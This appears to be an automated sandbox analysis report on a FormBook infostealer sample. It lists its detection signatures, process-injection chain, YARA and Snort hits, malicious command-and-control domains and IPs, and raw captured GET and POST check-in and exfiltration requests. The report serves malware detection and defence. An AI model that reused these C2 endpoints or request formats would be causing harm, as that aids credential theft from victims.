Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:794399
MD5:02df8c86345d056735fa60116b93ed2b
SHA1:70294e9e09c8d9d895599b73d1091c4013aee691
SHA256:c7627adc0797d3315c2c942356c8cb1fca39afbd0335512236be79a6e2f7acb3
Tags:NETexeMSIL
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • file.exe (PID: 1268 cmdline: C:\Users\user\Desktop\file.exe MD5: 02DF8C86345D056735FA60116B93ED2B)
    • CasPol.exe (PID: 5336 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
    • CasPol.exe (PID: 5312 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
      • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 1972 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
    00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    00000004.00000002.511979263.0000000000890000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
      00000004.00000002.511979263.0000000000890000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      Source | Rule | Description | Author | Strings
      2.2.CasPol.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
        2.2.CasPol.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
        2.2.CasPol.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        2.2.CasPol.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
          2.2.CasPol.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
          No Sigma rule has matched
          Timestamp:01/30/23-14:52:54.016726
          Source IP:192.168.2.6
          Destination IP:184.94.215.91
          SID:2031449
          Source Port:49729
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:01/30/23-14:52:54.016726
          Source IP:192.168.2.6
          Destination IP:184.94.215.91
          SID:2031453
          Source Port:49729
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:01/30/23-14:52:54.016726
          Source IP:192.168.2.6
          Destination IP:184.94.215.91
          SID:2031412
          Source Port:49729
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          AV Detection

          Source: file.exe ReversingLabs: Detection: 61%
          Source: file.exe Virustotal: Detection: 51%
          Source: Yara match File source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.511979263.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.285119335.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: file.exe Avira: detected
          Source: https://www.n-r-eng.com/crhz/?ghJ5T=O29nP3ATS/5Z6K6ZOqFFpve/mTBG7paw5 Avira URL Cloud: Label: malware
          Source: http://www.hvlandscapes.biz/crhz/ Avira URL Cloud: Label: malware
          Source: http://www.frogair.online Avira URL Cloud: Label: malware
          Source: http://www.laylaroseuk.com Avira URL Cloud: Label: malware
          Source: http://www.mitsubangsaen.online Avira URL Cloud: Label: malware
          Source: http://www.mitsubangsaen.online/crhz/ Avira URL Cloud: Label: malware
          Source: http://www.teammart.online Avira URL Cloud: Label: malware
          Source: http://www.n-r-eng.com/crhz/ Avira URL Cloud: Label: malware
          Source: http://www.hayuterce.com Avira URL Cloud: Label: malware
          Source: http://www.n-r-eng.com Avira URL Cloud: Label: malware
          Source: http://www.hayuterce.com/crhz/ Avira URL Cloud: Label: malware
          Source: http://www.teammart.online/crhz/ Avira URL Cloud: Label: malware
          Source: http://www.sandpiper-apts.com/crhz/ Avira URL Cloud: Label: malware
          Source: http://www.frogair.online/crhz/ Avira URL Cloud: Label: malware
          Source: http://www.suachuadienlanh247.com/crhz/ Avira URL Cloud: Label: malware
          Source: http://www.laylaroseuk.com/crhz/ Avira URL Cloud: Label: malware
          Source: file.exe Joe Sandbox ML: detected
          Source: 2.2.CasPol.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
          Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: msiexec.pdb source: CasPol.exe, 00000002.00000002.285603663.0000000001390000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: CasPol.exe, 00000002.00000002.285603663.0000000001390000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: caspol.pdbdv source: explorer.exe, 00000003.00000002.529615477.0000000014033000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.515930309.0000000004833000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: HBhG.pdbHw^w Pw_CorExeMainmscoree.dll source: file.exe
          Source: Binary string: wntdll.pdbUGP source: CasPol.exe, 00000002.00000003.249624955.0000000001238000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000002.00000003.247629652.0000000001093000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.287312928.0000000004359000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.284760450.00000000041C2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: caspol.pdb source: explorer.exe, 00000003.00000002.529615477.0000000014033000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.515930309.0000000004833000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: CasPol.exe, CasPol.exe, 00000002.00000003.249624955.0000000001238000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000002.00000003.247629652.0000000001093000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.287312928.0000000004359000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.284760450.00000000041C2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: HBhG.pdb source: file.exe
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_006331A0 FindFirstFileW,FindNextFileW,FindClose, 4_2_006331A0
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then pop edi 4_2_00628D80
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4x nop then pop edi 4_2_00628D7F

          Networking

          Source: C:\Windows\explorer.exe Domain query: www.tf8dangky.online
          Source: C:\Windows\explorer.exe Network Connect: 76.223.105.230 80
          Source: C:\Windows\explorer.exe Network Connect: 164.88.201.214 80
          Source: C:\Windows\explorer.exe Domain query: www.sandpiper-apts.com
          Source: C:\Windows\explorer.exe Domain query: www.frogair.online
          Source: C:\Windows\explorer.exe Network Connect: 163.44.198.50 80
          Source: C:\Windows\explorer.exe Domain query: www.hvlandscapes.biz
          Source: C:\Windows\explorer.exe Network Connect: 184.94.215.91 80
          Source: C:\Windows\explorer.exe Network Connect: 185.151.199.52 80
          Source: C:\Windows\explorer.exe Network Connect: 18.138.206.213 80
          Source: C:\Windows\explorer.exe Network Connect: 81.169.145.72 80
          Source: C:\Windows\explorer.exe Domain query: www.n-r-eng.com
          Source: C:\Windows\explorer.exe Domain query: www.teammart.online
          Source: C:\Windows\explorer.exe Domain query: www.laylaroseuk.com
          Source: C:\Windows\explorer.exe Network Connect: 103.221.223.104 80
          Source: C:\Windows\explorer.exe Domain query: www.mitsubangsaen.online
          Source: C:\Windows\explorer.exe Domain query: www.suachuadienlanh247.com
          Source: C:\Windows\explorer.exe Network Connect: 2.57.90.16 80
          Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49729 -> 184.94.215.91:80
          Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49729 -> 184.94.215.91:80
          Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49729 -> 184.94.215.91:80
          Source: Joe Sandbox View ASN Name: PARTNER-ASIL PARTNER-ASIL
          Source: global trafficHTTP traffic detected: GET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=1rNCCz7kTcLTieqVkhzplJgcoI94HvPGoNH0lVnmkmFXwmlt9jZmgzPB/kdX+WOK+rGt5Wg7VkzKMCVbaV5wfyZJWCK5Z18H2VF/y4/Kognk HTTP/1.1Host: www.laylaroseuk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?ghJ5T=O29nP3ATS/5Z6K6ZOqFFpve/mTBG7paw5+pol+lVZCotPeZJEV3KnsQwBw1FpEdPbpeQCJZSqBlkKVIQIQyw8OwcFAej9bBQBYULGapVGCZ8&90Z5=-8rTZKCzAmXPlO HTTP/1.1Host: www.n-r-eng.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=LNHYCELR2jrkl6ex9ablCycu9h3K7h+sZB96ERWJZAieoidRiLebg6j0RcHsFDDJ9r29OHFtYH9IplqsElTHfTI2iz39I/8+/5l0mHu4niU0 HTTP/1.1Host: www.sandpiper-apts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?ghJ5T=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T+pOqyJeQKS/uT906cjCl4jdAQhvn7mHg7wgiqcNtMEnJIHJg+N9005boEqGm8iwl7o0&90Z5=-8rTZKCzAmXPlO HTTP/1.1Host: www.tf8dangky.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=4Z6KAxgBWslvyWQs2zz1LTCSIJZnXz/Wr59nnN1quAvIIyJUwPyWYoHYYm82bfT5dpIzg2ZgrTpqnEgpaKo3IMTbbHn1kxCLU7tvpznsmq41 HTTP/1.1Host: www.teammart.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?ghJ5T=CCCEekJcxP1BHV4uutXMBlMorQncoYcW7RlEC0I+F0KDkaobIF+zubJ5fpyHcR0fDKGG4SO4PI1fmloML0V8WxzpJC6D/H2QJAQp0zm+InHs&90Z5=-8rTZKCzAmXPlO HTTP/1.1Host: www.suachuadienlanh247.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR8QJqKEWoluew4y5+XfIT1Onmlscs+4wa7bdRvmZkTM HTTP/1.1Host: www.hvlandscapes.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?ghJ5T=iycDOFv4tLFlCihz1M/bkpzttTI3wOwIoAcOv31GIYKsRKZ8f8EzkP6Z56SPUyztaOnMa+iauXtsUeY/SnJCIVqiEyUfq8kF6FnqNv3PiNZk&90Z5=-8rTZKCzAmXPlO HTTP/1.1Host: www.frogair.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=nqmZBp2BkKhv5XD7JtliHBtb5J/nACgDXsCawcooXFLLWI2M3W+/ErAqTridlmxSnsXQQ5N94lpVUeLYPOpWHcmhsJP5m/P/TeGXz1gc+4vL HTTP/1.1Host: www.mitsubangsaen.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox View IP Address: 18.138.206.213 18.138.206.213
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.n-r-eng.comConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.n-r-eng.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.n-r-eng.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 67 68 4a 35 54 3d 44 30 56 48 4d 42 42 4d 49 71 41 79 7a 4a 7e 67 54 63 42 5a 72 74 71 51 71 69 6c 78 30 71 32 37 34 4f 41 5a 70 71 68 55 41 6c 45 6c 4c 75 42 39 45 6c 43 64 67 4b 64 69 48 48 68 68 6e 6b 45 4f 56 61 71 65 4b 75 4e 59 71 48 42 5a 52 46 38 72 48 33 6d 79 7a 2d 41 30 47 52 75 67 38 4b 46 32 59 5a 38 4b 42 36 73 33 42 31 51 4a 46 41 7a 79 35 36 58 2d 77 4e 67 31 74 4f 73 50 6b 39 43 39 75 53 6d 58 73 70 6b 36 49 77 6c 73 5a 52 42 47 4c 45 4a 42 75 75 49 31 79 5a 46 37 44 46 54 4d 46 6f 4a 77 48 4d 47 54 56 6c 75 4d 74 5a 41 5f 57 43 6a 47 57 4d 6b 2e 00 00 00 00 00 00 00 00 Data Ascii: ghJ5T=D0VHMBBMIqAyzJ~gTcBZrtqQqilx0q274OAZpqhUAlElLuB9ElCdgKdiHHhhnkEOVaqeKuNYqHBZRF8rH3myz-A0GRug8KF2YZ8KB6s3B1QJFAzy56X-wNg1tOsPk9C9uSmXspk6IwlsZRBGLEJBuuI1yZF7DFTMFoJwHMGTVluMtZA_WCjGWMk.
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.n-r-eng.comConnection: closeContent-Length: 1455Cache-Control: no-cacheOrigin: http://www.n-r-eng.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.n-r-eng.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 67 68 4a 35 54 3d 44 30 56 48 4d 42 42 4d 49 71 41 79 79 70 75 67 52 37 39 5a 6a 74 71 54 76 69 6c 78 36 36 32 5f 34 4f 45 5a 70 76 4e 45 41 58 49 6c 46 64 70 39 46 41 32 64 7a 36 64 69 42 48 68 6c 70 45 46 48 56 63 47 6b 4b 73 55 74 71 42 5a 5a 65 46 4d 72 42 31 65 39 34 75 41 79 43 52 75 6a 38 4b 46 5a 59 59 4d 57 42 36 70 53 42 31 49 4a 45 32 76 79 28 4b 58 5f 28 74 67 31 74 4f 73 44 6b 39 43 52 75 53 28 45 73 6f 4d 51 4c 42 31 73 58 55 4e 47 4a 6e 68 47 6f 75 4a 38 39 4a 45 74 51 42 4c 4a 50 70 38 32 50 4a 66 78 47 30 36 6f 6f 61 74 58 53 69 62 61 4b 73 55 63 30 4f 55 56 4a 45 6d 72 36 69 7e 6f 77 52 39 49 55 6c 6b 69 36 62 50 70 76 53 51 47 5a 39 68 39 4a 50 6a 79 66 4a 39 6d 56 39 66 59 63 49 42 6b 6f 44 75 65 7a 6f 5a 59 35 62 70 47 52 73 55 57 78 37 4d 74 69 39 4d 4e 61 44 72 4b 57 32 76 43 48 32 69 4f 4e 37 4c 47 32 51 52 50 4f 56 51 62 30 78 34 33 61 48 76 59 36 47 4b 6c 43 5a 55 56 6c 68 79 6b 7e 78 7e 6f 38 48 33 32 4f 68 6d 34 54 30 4a 4b 70 6b 77 5a 58 43 6e 49 48 44 77 61 7a 6b 72 7a 6a 4e 4d 75 62 4a 51 32 67 32 31 72 6f 6a 71 77 62 47 4e 75 7a 72 45 5f 57 37 35 66 6f 76 47 67 36 75 56 65 5a 56 55 34 48 42 44 35 51 69 67 6d 44 76 45 5a 36 39 55 47 73 42 41 36 50 67 66 58 6b 7a 64 51 6b 6d 48 48 76 57 64 44 56 59 6f 70 28 6a 70 55 5a 62 71 61 78 37 62 77 4e 43 72 55 53 36 65 38 7e 6a 52 6c 47 69 72 78 30 49 4f 55 78 6c 4b 41 57 41 31 58 4b 72 44 6e 4b 61 7e 4b 71 54 52 4d 33 78 6c 38 7e 6a 61 6a 78 53 76 5f 46 77 74 35 73 7a 4a 46 6b 75 65 6c 71 6a 67 4b 43 41 4b 53 4f 30 7a 35 55 79 4d 2d 74 74 74 32 43 73 32 4d 68 66 38 6e 65 
76 67 43 4e 44 74 33 39 35 78 77 77 73 6d 6d 6e 52 74 30 77 71 4b 37 55 6d 4d 6d 45 55 6f 59 46 43 67 6b 57 51 73 71 41 38 69 4d 66 72 4a 63 31 54 68 2d 31 45 63 61 7a 4e 46 58 55 45 56 5f 58 75 4b 4b 45 6d 39 63 30 4b 75 39 44 69 74 44 44 71 45 43 47 71 30 4d 4d 41 75 44 7e 69 28 75 32 76 44 47 39 4e 33 5a 5a 6a 6f 61 58 67 54 59 66 6d 76 70 42 35 76 4f 55 48 6f 4b 4f 33 45 44 7a 72 4d 38 34 61 36 34 48 76 78 62 73 61 53 76 68 67 59 7a 5a 32 50 4e 57 30 56 6a 4c 51 63 37 47 58 51 42 48 7a 4e 6f 52 51 7e 53 56 73 33 5a 5a 78 6a 52 35 46 57 75 56 32 39 5a 4b 46 56 44 67 56 77 4b 53 67 42 55 30 4b 7e 47 68 73 4b 79 7a 34 6e 59 78 49 55 33 75 4a 59 5a 59 5a 61 43 55 7a 4c 4a 6c 42 6d 4c 46 4f 6f 56 39 39 46 66 68 4c 52 78 4e 76 31 42 62 77 41 4c 4c 57 46 6d 57 71 51 49 56 55 65 6a 33 54 45 30 74 41 42 6b 34 6f 65 79 77 77 42 63 65 54 52 43 4f 79 63 52 6c 46 72 56 6e 78 79 71 33 55 71 58 56 66 4b 79 50 42 4a 78 73 5a 72 61 4f 45 54 61 32 61 68 59 61 75 74 50 43 32 58 4d 34 68 47 50 44 6b 31 52 72 73 39 36 46 72 44 57 45 4
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.sandpiper-apts.comConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.sandpiper-apts.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sandpiper-apts.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 67 68 4a 35 54 3d 47 50 76 34 42 78 75 39 6b 78 61 45 69 49 75 4b 72 4a 37 72 63 31 41 72 28 79 4c 57 33 54 36 4e 42 30 55 46 43 52 53 30 50 6e 65 57 67 77 74 78 74 63 43 62 67 35 33 30 5a 5a 62 49 4b 48 69 6a 71 5a 76 30 54 79 52 35 51 55 67 2d 77 56 71 54 50 42 50 78 59 79 49 66 6c 45 75 6e 4a 4d 64 49 72 5a 6c 78 68 31 4b 54 6d 58 46 69 5a 55 48 76 4b 6f 67 63 70 6b 55 54 28 48 71 53 52 6b 70 6b 50 4e 58 57 6c 4c 66 39 70 47 4c 6c 30 42 59 32 72 5a 69 69 41 61 39 34 66 6b 57 50 62 61 53 4b 39 78 6a 55 44 70 39 77 75 2d 41 68 71 75 68 6e 30 37 61 4f 37 64 41 2e 00 00 00 00 00 00 00 00 Data Ascii: ghJ5T=GPv4Bxu9kxaEiIuKrJ7rc1Ar(yLW3T6NB0UFCRS0PneWgwtxtcCbg530ZZbIKHijqZv0TyR5QUg-wVqTPBPxYyIflEunJMdIrZlxh1KTmXFiZUHvKogcpkUT(HqSRkpkPNXWlLf9pGLl0BY2rZiiAa94fkWPbaSK9xjUDp9wu-Ahquhn07aO7dA.
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.sandpiper-apts.comConnection: closeContent-Length: 1455Cache-Control: no-cacheOrigin: http://www.sandpiper-apts.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sandpiper-apts.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 67 68 4a 35 54 3d 47 50 76 34 42 78 75 39 6b 78 61 45 6a 70 65 4b 71 71 54 72 4c 46 41 30 6d 79 4c 57 7e 7a 36 4a 42 30 6f 46 43 55 7a 76 50 56 53 57 67 6e 78 78 74 2d 71 62 69 35 33 30 4f 4a 62 4d 46 6e 69 70 71 5a 71 4e 54 33 74 50 51 57 4d 2d 32 30 36 54 4a 44 58 32 58 69 49 64 68 45 75 6d 4a 4d 63 53 72 5a 30 32 68 32 6d 35 6d 58 4e 69 5a 69 72 76 43 34 67 54 6d 45 55 54 28 48 71 4f 52 6b 6f 39 50 4e 66 4f 6c 50 54 55 70 31 6a 6c 33 6c 41 32 74 36 4b 74 4a 36 39 30 63 6b 58 7a 61 5f 4f 42 6c 42 76 51 56 35 4a 31 7e 4e 30 7a 6d 66 4d 35 6f 71 53 4a 28 59 59 6f 5a 50 75 54 46 70 66 43 77 75 67 62 43 34 70 6c 42 59 39 57 54 69 6a 6e 31 75 4b 53 64 52 47 75 55 77 54 6d 59 76 66 65 44 5f 4a 59 33 4b 51 5a 4a 33 66 4e 43 6d 75 2d 6a 59 4b 43 66 2d 52 78 52 36 53 50 64 4a 34 55 45 34 47 6a 53 30 62 68 63 58 41 6a 54 46 47 57 53 67 4a 4f 4b 76 50 36 41 50 41 59 4e 2d 57 6f 78 4d 79 69 61 74 4e 76 56 42 58 62 49 6f 72 5a 75 68 77 44 56 30 7a 4a 71 54 35 69 69 45 35 66 6d 33 6c 6f 33 49 7a 4e 50 41 32 6d 68 32 67 70 4a 69 43 65 31 4e 41 49 74 59 47 62 47 42 56 38 75 2d 53 69 57 6e 51 4f 33 79 54 6c 46 79 72 51 7a 57 61 48 67 45 6c 5a 6e 42 4c 79 69 78 46 4a 42 69 34 78 31 41 36 72 51 55 63 6a 46 7a 70 62 39 42 51 4c 44 70 57 6e 47 47 36 2d 79 4d 69 7a 64 36 70 6f 50 64 78 59 51 67 6a 44 43 63 68 39 42 6e 32 70 59 44 59 6e 28 6d 34 6c 76 39 37 74 61 5f 36 66 42 39 75 55 31 6e 73 4d 72 39 38 42 4d 44 47 69 6b 72 47 35 7a 38 38 64 6c 5a 34 48 76 75 64 44 4a 53 37 36 70 37 79 62 52 52 71 44 44 76 4d 59 58 71 32 5f 67 73 55 59 57 33 
63 67 33 71 49 70 62 65 65 58 64 42 65 44 28 54 45 73 35 6f 4c 4a 75 7a 47 68 5a 74 49 70 71 67 49 4f 49 77 34 64 42 30 64 50 76 41 32 30 6c 44 55 62 4f 32 45 77 67 56 66 6a 61 71 33 4a 68 45 44 57 36 55 76 2d 6c 33 65 50 71 6e 4b 73 38 6e 47 66 55 78 78 74 4e 46 4b 70 38 34 77 69 73 36 6d 74 4b 63 49 46 58 31 58 46 4d 46 28 6c 78 47 28 54 57 6a 38 35 6b 30 53 51 56 4d 68 4e 42 66 58 37 77 57 45 68 6f 64 48 67 68 4c 6b 42 33 52 7a 65 55 5f 56 36 36 43 55 73 54 61 69 2d 33 5f 59 48 6c 73 59 72 4d 55 57 31 54 71 70 6e 33 46 6d 70 6c 50 30 4d 53 68 30 73 55 4d 68 51 72 70 71 75 61 6e 55 30 74 44 62 59 7e 65 4a 79 54 46 6c 6e 33 75 31 33 4b 4f 52 79 65 7a 4a 42 73 44 4c 63 70 38 47 67 61 70 68 5f 5a 30 4f 71 61 67 38 46 6d 6e 58 57 54 4c 48 4f 39 32 44 36 61 47 49 65 56 70 75 67 7e 78 78 36 46 69 4f 7a 68 44 70 5a 73 56 33 4f 52 31 7a 58 64 65 7e 4f 67 72 34 69 58 61 71 63 28 4c 56 59 37 76 71 5f 53 35 50 44 6e 36 79 5f 51 52 32 63 34 73 59 55 4a 48 28 6a 4c 53 79 31 78 5a 6f 34 36 77 6b 43 6f 37 38 34 4b 63 7a 75 6c 65 6
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.tf8dangky.onlineConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.tf8dangky.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tf8dangky.online/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 67 68 4a 35 54 3d 31 5a 4e 6d 7e 71 37 64 47 32 57 50 6f 57 74 51 5a 43 63 2d 67 70 42 7a 34 58 53 39 47 48 76 4f 65 65 62 4e 55 58 57 38 4d 49 31 50 6f 53 63 46 61 74 75 6e 6d 44 45 70 38 34 7a 6f 69 34 7e 6e 58 44 35 78 71 4e 69 51 72 71 56 51 30 49 4d 79 71 59 59 5f 48 74 28 36 39 39 52 64 33 58 68 30 70 6b 61 67 71 4e 7e 74 6e 38 78 5f 35 6f 68 7a 48 76 6b 58 71 6c 71 35 36 76 71 35 6e 33 31 71 74 75 78 70 4d 43 63 43 56 75 34 75 73 71 56 75 61 6d 46 36 28 45 4a 37 38 77 55 67 65 6e 74 35 6d 6b 46 5a 30 45 39 63 4e 6e 31 4a 36 48 59 41 4e 6d 53 71 62 56 45 2e 00 00 00 00 00 00 00 00 Data Ascii: ghJ5T=1ZNm~q7dG2WPoWtQZCc-gpBz4XS9GHvOeebNUXW8MI1PoScFatunmDEp84zoi4~nXD5xqNiQrqVQ0IMyqYY_Ht(699Rd3Xh0pkagqN~tn8x_5ohzHvkXqlq56vq5n31qtuxpMCcCVu4usqVuamF6(EJ78wUgent5mkFZ0E9cNn1J6HYANmSqbVE.
